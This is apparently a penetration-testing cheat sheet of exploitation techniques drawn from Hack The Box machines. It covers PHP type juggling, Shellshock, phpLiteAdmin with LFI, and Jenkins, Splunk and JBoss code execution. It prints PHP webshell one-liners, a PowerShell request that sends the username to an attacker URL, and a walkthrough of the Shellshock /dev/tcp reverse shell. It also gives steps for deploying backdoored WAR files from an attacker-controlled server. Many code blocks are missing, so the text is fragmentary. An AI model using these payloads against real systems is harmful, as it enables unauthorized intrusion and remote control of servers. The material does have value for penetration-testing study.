Exploitation Techniques
Useful Commands
Testing for code execution :
sudo tcpdump -i tun0 ip proto \\icmp -vv
powershell.exe Invoke-WebRequest -URI http://<URL>/$env:UserName
$env:userdnsdomain
Decryption
Exploiting HTTP PUT Method
WebDAV
Enumerate PUT Method : Allowed File Types
Drupal Code Exec
Authentication required
Jenkins
Reference: HTB Jeeves
Script Console
Execute Groovy script reverse shell on the server
PHP Type Juggling
Method 1
‘==’ operator : Loose comparison
‘===’ operator: Strict comparsion (Fix)
Type juggling means If PHP decides that both operands look like numbers, even if they are actually strings, it will convert them both and perform a numeric comparison.
PHP sees a number (0), followed by the letter "e", and it converts the MD5 string to exponential notation (e.g. 0462097431906509019562988736854). Because both MD5 hashes start with "0e", they both evaluate to 0, making them numerically equivalent.
When magic hashes are compared against the hash of the actual value, and if they both are treated as “0” and therefore evaluated as true, you will be able to log into the account without the valid password.
Method 2
Sending in the
password
POST data as an array.
Change this to:
Explaination:PHP is generous with how it handles comparing different types of data. So if the PHP is doing a string compare of a password from a database (or hard codeded as is the case here) and the user input, it might look like this:
strcmp
returns where the two strings differ, as I can see in an interactive PHP terminal (run php -a
):
If I pass in an array as one of the strings, PHP fails:
However, it is actually returning a NULL, and if that NULL is then compared to 0, it evaluates true:
phpLiteAdmin v1.9
Requires Authentication + LFI
Exploitation:
Create a database:
Create a table with 1 field
Create a field, change the Type to TEXT, and enter our script:
<?php echo shell_exec($_GET["cmd"]); exit; ?>
<?php system($_REQUEST["cmd"]);?>
Exploit using LFI Vulnerability
MongoDB
Default Port:27017
Commands
Payload
ShellShock Vulnerability [CVE-2014-6271]
This vulnerability impacts Bash. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface "CGI".
CGIs commonly use Python or Perl but it's not uncommon to find (on old servers), CGI written in Shell or even C.
When you call a CGI, the web server (Apache here) will start a new process and run the CGI. Here it will start a Bash process and run the CGI script.
Apache needs to pass information to the CGI script. To do so, it uses environment variables. Environment variables are available inside the CGI script. It allows Apache to easily pass every headers (amongst other information) to the CGI. If you have a HTTP header named
Blah
in your request, you will have an environment variable namedHTTP_BLAH
available in your CGI.
Fingerprint directories such as /cgi-sys, /cgi-mod, /cgi-bin,/session_login.cgi etc.
Theory
The source of the issue is that Bash can have internal function declaration in its environment variable.
First, we need to declare that the environment variable is a function using ()
. Then we will add an empty body for the function. Finally, we can start adding the command we want to run after the function declaration. More details can be found in the following email on oss-sec
Apache uses environment variables to pass headers to the CGI. Since it's a Bash based CGI, we will be able to run arbitrary command by declaring an empty function and add a command after this declaration.
Exploitation
Vulnerable Headers:
Referrer
User-Agent
() { ignored;}; is the ShellShock exploit
/bin/bash -i is an interactive Bash session
>& /dev/tcp/<IP>/<PORT>redirect standard output and standard error to the remote host (i.e.: /dev/tcp/1.2.3.4/8080 redirect the bash session to IP 1.2.3.4 on TCP port 8080)
0>&1 read the standard input. This should be 0<&1 but it works well in both cases.
Reference: HTB - Beep
Splunk 7.0
Requires authenticated access to management console.
Download the release from https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz
Navigate to the "Manage Apps" and click on "Install app from file". Upload this file.
Reference:
JBoss
Admin-Console
Check for default credentials : admin::admin.
With admin privileges, we can upload a war file locally and gain a web shell.
Once uploaded, activate the WAR file within the console, post which the file can be accessed through browser.
Default JMX-Console
Navigate to the JMX Console on the target host (http://<URL:8080>/jmx-console/)
If the JMX-Console is not password-protected, a malicious WAR file can be requested from an attacker controlled server. This WAR file is downloaded and automatically deployed onto the Jboss server. This can be done via 2 methods :
Search for
service=MainDeployer
[Jboss.system] (Walkthrough: Reference)Search for :
flavor=URL
,type=DeploymentScanner
[Jboss.deployment] (Walkthrough: Reference)
Exploitation
Download a WAR file backdoor.
JSP webshell : Fuzzdb
Host the malicious WAR file on an attacker controlled server. (
python3 -m http.server )
Invoke a request to the hosted file. (
java.net.URL
)
Sometimes outbound requests to the internet may be blocked. In that case host the file locally.
If successful, you can access the uploaded file at <URL>:8080/cmd/cmd.jsp
Get the command GUI by following the instructions from the WAR file's git repo.
Last updated